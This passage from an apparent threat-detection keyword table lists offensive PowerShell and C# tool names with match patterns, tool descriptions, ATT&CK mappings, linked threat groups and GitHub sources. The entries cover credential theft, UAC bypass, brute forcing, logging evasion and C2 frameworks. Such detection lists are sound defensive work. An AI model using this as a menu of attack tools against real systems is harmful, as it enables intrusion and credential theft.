TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Invoke-AzVMBulkCMD.ps1*",".{0,1000}Invoke\-AzVMBulkCMD\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Invoke-BackdoorLNK*",".{0,1000}Invoke\-BackdoorLNK.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BackdoorLNK.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-BackdoorLNK*",".{0,1000}Invoke\-BackdoorLNK.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1115","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-BadPotato*",".{0,1000}Invoke\-BadPotato.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-BadZure*",".{0,1000}Invoke\-BadZure.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","350","20","2023-12-04T16:14:07Z","2023-05-05T04:52:21Z" "*Invoke-BetterSafetyKatz*",".{0,1000}Invoke\-BetterSafetyKatz.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-BetterXencrypt*",".{0,1000}Invoke\-BetterXencrypt.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*Invoke-Binary *.exe*",".{0,1000}Invoke\-Binary\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "*Invoke-BitlockerCheck*",".{0,1000}Invoke\-BitlockerCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-BlockETW*",".{0,1000}Invoke\-BlockETW.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-BlockETW*",".{0,1000}Invoke\-BlockETW.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*InvokeBloodHound*",".{0,1000}InvokeBloodHound.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","0","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" "*Invoke-BloodHound*",".{0,1000}Invoke\-BloodHound.{0,1000}","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*invoke-bloodhound*",".{0,1000}invoke\-bloodhound.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-BloodHound*",".{0,1000}Invoke\-BloodHound.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*Invoke-Bloodhound.ps1*",".{0,1000}Invoke\-Bloodhound\.ps1.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*Invoke-Bof *",".{0,1000}Invoke\-Bof\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","10","10","244","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*Invoke-Bof.ps1*",".{0,1000}Invoke\-Bof\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","244","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*Invoke-BruteAvailableLogons*",".{0,1000}Invoke\-BruteAvailableLogons.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","115","21","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z" "*Invoke-BruteClientIDAccess*",".{0,1000}Invoke\-BruteClientIDAccess.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Test different client_id's against MSGraph to determine permissions","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-BruteForce*",".{0,1000}Invoke\-BruteForce.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-BruteLogonAccount*",".{0,1000}Invoke\-BruteLogonAccount.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","115","21","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z" "*Invoke-BruteLogonList*",".{0,1000}Invoke\-BruteLogonList.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","115","21","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z" "*Invoke-BSOD*",".{0,1000}Invoke\-BSOD.{0,1000}","offensive_tool_keyword","Invoke-BSOD","A PowerShell script to induce a Blue Screen of Death (BSOD) without admin privileges. Also enumeartes Windows crash dump settings.","T1561 - T1059","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/peewpw/Invoke-BSOD","1","0","N/A","N/A","3","276","73","2018-04-03T13:36:45Z","2018-03-30T14:20:10Z" "*Invoke-BuildAnonymousSMBServer -*",".{0,1000}Invoke\-BuildAnonymousSMBServer\s\-.{0,1000}","offensive_tool_keyword","Invoke-BuildAnonymousSMBServer","Use to build an anonymous SMB file server","T1570 - T1027 - T1071.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer","1","0","N/A","6","3","225","42","2021-08-20T14:52:10Z","2021-07-10T01:23:43Z" "*Invoke-BuildAnonymousSMBServer.ps1*",".{0,1000}Invoke\-BuildAnonymousSMBServer\.ps1.{0,1000}","offensive_tool_keyword","Invoke-BuildAnonymousSMBServer","Use to build an anonymous SMB file server","T1570 - T1027 - T1071.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer","1","1","N/A","6","3","225","42","2021-08-20T14:52:10Z","2021-07-10T01:23:43Z" "*Invoke-BypassUAC*",".{0,1000}Invoke\-BypassUAC.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-BypassUAC*",".{0,1000}Invoke\-BypassUAC.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1123","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-CallbackIEX*",".{0,1000}Invoke\-CallbackIEX.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Carbuncle*",".{0,1000}Invoke\-Carbuncle.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Cats -pwds*",".{0,1000}Invoke\-Cats\s\-pwds.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*Invoke-Cats.ps1*",".{0,1000}Invoke\-Cats\.ps1.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*Invoke-CcmNaaCredentialsCheck*",".{0,1000}Invoke\-CcmNaaCredentialsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-Certify*",".{0,1000}Invoke\-Certify.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Certify*",".{0,1000}Invoke\-Certify.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-CheckAccess*",".{0,1000}Invoke\-CheckAccess.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Check if tokens are valid","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*invokechecklocaladminaccess*",".{0,1000}invokechecklocaladminaccess.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-CheckLocalAdminAccess*",".{0,1000}Invoke\-CheckLocalAdminAccess.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-CheckLocalAdminAccess*",".{0,1000}Invoke\-CheckLocalAdminAccess.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*invoke-checklocaladminaccess*",".{0,1000}invoke\-checklocaladminaccess.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","9","835","111","2024-04-12T10:12:03Z","2016-07-06T13:25:09Z" "*Invoke-CleverSpray*",".{0,1000}Invoke\-CleverSpray.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and 